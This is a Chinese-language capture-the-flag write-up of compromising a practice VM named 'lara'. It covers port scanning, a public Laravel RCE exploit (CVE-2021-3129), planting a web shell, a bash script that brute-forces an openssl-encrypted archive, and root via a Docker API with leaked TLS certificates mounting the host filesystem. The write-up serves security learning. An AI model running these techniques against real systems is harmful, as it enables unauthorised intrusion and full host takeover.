靶机复盘-lara

Seguimos hablando en el metro

En el restaurante de Hunan

信息收集

靶机ip:192.168.56.206

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
RustScan: Where scanning meets swagging. 😎

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.56.207:22
Open 192.168.56.207:80
Open 192.168.56.207:8000
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-05 21:07 EST
Initiating ARP Ping Scan at 21:07
Scanning 192.168.56.207 [1 port]
Completed ARP Ping Scan at 21:07, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:07
Completed Parallel DNS resolution of 1 host. at 21:07, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:07
Scanning 192.168.56.207 [3 ports]
Discovered open port 80/tcp on 192.168.56.207
Discovered open port 22/tcp on 192.168.56.207
Discovered open port 8000/tcp on 192.168.56.207
Completed SYN Stealth Scan at 21:07, 0.03s elapsed (3 total ports)
Nmap scan report for 192.168.56.207
Host is up, received arp-response (0.0011s latency).
Scanned at 2026-01-05 21:07:16 EST for 0s

PORT     STATE SERVICE  REASON
22/tcp   open  ssh      syn-ack ttl 64
80/tcp   open  http     syn-ack ttl 64
8000/tcp open  http-alt syn-ack ttl 63
MAC Address: 08:00:27:16:0A:15 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

访问80端口

尝试了一通命令注入无果,访问8000端口。

得到使用的框架及其版本,网上找了个能用的exp。

joshuavanderpoll/CVE-2021-3129: Laravel RCE Exploit Script - CVE-2021-3129 (user-friendly with automatic log detection)

GetNobody/Alice

成功弹回shell,但是一眼docker容器,尝试逃逸失败。

扒拉了一阵信息也没什么有用的。

但是这时发现容器的权限可以任意写入网页主目录。

那么在网页主目录写马。

用蚁剑成功连接

在/home下发现Alice用户及其文件ilovealice,怀疑是密码,之后成功以alice的身份登录。

Root

查看alice当前文件下目录,发现enc文件。

使用老大提供的脚本解密,是一个压缩文件,之后得到三个pem文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
cat enc_brute.sh      
#!/bin/bash

INPUT_FILE="1.enc"
DICTIONARY="techyou.txt"

while IFS= read -r password; do
    openssl enc -aes-256-cbc -d -in "$INPUT_FILE" -out decrypted.tar.gz -iter 10000 -pbkdf2 -pass pass:"$password" 2>/dev/null

    if [ $? -eq 0 ] ; then
        a=$(file decrypted.tar.gz|grep 'decrypted.tar.gz: data')
        if [ -z "$a" ];then
        echo "------------------------------------------"
        echo "找到密码: $password"
        echo "文件已解密为: decrypted.tar.gz"
        echo "------------------------------------------"
        exit 0
        fi
    fi
done < "$DICTIONARY"

echo "字典已尝试完毕,未发现正确密码。"
1
2
3
4
5
 sudo bash enc_brute.sh 
------------------------------------------
找到密码: 060606
文件已解密为: decrypted.tar.gz
------------------------------------------

之后的路可以说是畅通无阻……才怪,首先我们要转发出去docker内部的api端口(之前的图已经转发到了8888)

顺便说一下这几个pem的作用(AI)

这三个文件分别对应身份验证中的“验证方”、“身份ID”和“本人证明”:

1. ca.pem(信任公章) 这是信任的根基。你的 Docker 客户端使用它来验证服务端的身份,确保你连接的是真正的目标服务器(192.168.56.207),防止连接到黑客伪造的“中间人”服务器。

2. client-cert.pem(公开身份证) 这是你的公开身份文件。在建立连接时,你会把它发送给 Docker 服务端,相当于出示一张门禁卡,告诉服务端:“我是被授权的用户,这是我的证件信息。”

3. client-key.pem(私钥指纹) 这是你的核心机密,相当于指纹或密码。服务端收到你的“身份证”后,会要求你用这个私钥进行数字签名。只有拥有此私钥,才能证明你确实是那张“身份证”的主人,从而获得 Root 控制权。

1
2
3
4
5
┌──(root㉿kali)-[/home/kali/Desktop/certs]
└─# curl -k https://192.168.56.207:8888/version \
  --cert client-cert.pem \
  --key client-key.pem
{"Platform":{"Name":""},"Components":[{"Name":"Engine","Version":"28.3.3","Details":{"ApiVersion":"1.51","Arch":"amd64","BuildTime":"2025-12-02T23:05:51.000000000+00:00","Experimental":"false","GitCommit":"bea959c7b793b32a893820b97c4eadc7c87fabb0","GoVersion":"go1.24.11","KernelVersion":"6.12.59-0-lts","MinAPIVersion":"1.24","Os":"linux"}},{"Name":"containerd","Version":"v2.1.5","Details":{"GitCommit":"fcd43222d6b07379a4be9786bda52438f0dd16a1"}},{"Name":"runc","Version":"1.3.4","Details":{"GitCommit":"d842d7719497cc3b774fd71620278ac9e17710e0"}},{"Name":"docker-init","Version":"0.19.0","Details":{"GitCommit":""}}],"Version":"28.3.3","ApiVersion":"1.51","MinAPIVersion":"1.24","GitCommit":"bea959c7b793b32a893820b97c4eadc7c87fabb0","GoVersion":"go1.24.11","Os":"linux","Arch":"amd64","KernelVersion":"6.12.59-0-lts","BuildTime":"2025-12-02T23:05:51.000000000+00:00"}

用curl查看,确定可以访问。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(root㉿kali)-[/home/kali/Desktop/certs]
└─# docker --tls \
  --tlscert=client-cert.pem \
  --tlskey=client-key.pem \
  -H tcp://192.168.56.207:8888 \
  version
Client:
 Version:           26.1.5+dfsg1
 API version:       1.45
 Go version:        go1.24.2
 Git commit:        a72d7cd
 Built:             Sat May 24 17:38:32 2025
 OS/Arch:           linux/amd64
 Context:           default

Server:
 Engine:
  Version:          28.3.3
  API version:      1.51 (minimum version 1.24)
  Go version:       go1.24.11
  Git commit:       bea959c7b793b32a893820b97c4eadc7c87fabb0
  Built:            Tue Dec  2 23:05:51 2025
  OS/Arch:          linux/amd64
  Experimental:     false
 containerd:
  Version:          v2.1.5
  GitCommit:        fcd43222d6b07379a4be9786bda52438f0dd16a1
 runc:
  Version:          1.3.4
  GitCommit:        d842d7719497cc3b774fd71620278ac9e17710e0
 docker-init:
  Version:          0.19.0
  GitCommit:

探测docker容器

1
2
3
4
5
6
7
┌──(root㉿kali)-[/home/kali/Desktop/certs]
└─# # 在当前终端设置别名 (临时生效)
alias dhost='docker --tls --tlscert=client-cert.pem --tlskey=client-key.pem -H tcp://192.168.56.207:8888'                                                                                                                                                        
┌──(root㉿kali)-[/home/kali/Desktop/certs]
└─# dhost images
REPOSITORY     TAG       IMAGE ID       CREATED      SIZE
laravel-vuln   latest    aaf7bbe495b7   9 days ago   141MB

成功root

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(root㉿kali)-[/home/kali/Desktop/certs]
└─# # 使用本地的 laravel-vuln 镜像,并尝试启动 /bin/bash (如果没有bash则尝试 /bin/sh)
dhost run -it --rm -v /:/mnt laravel-vuln /bin/sh  
/src/laravel # chroot /mnt /bin/bash
chroot: can't execute '/bin/bash': No such file or directory
/src/laravel # chroot /mnt /bin/sh
/ # id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/ # cd /root
~ # ls
root.txt
~ # cat root.txt
flag{root-ede49d353365dfcf95b6bf8df1b7a2dc}
~ #

真的是一路要提示过来的(除了user部分),太菜了我,以后要看一看docker和openssl加密这一块。

#复盘
靶机复盘-lara
http://example.com/2026/01/06/靶机复盘-lara/
Author
Skyarrow
Posted on
January 6, 2026
Licensed under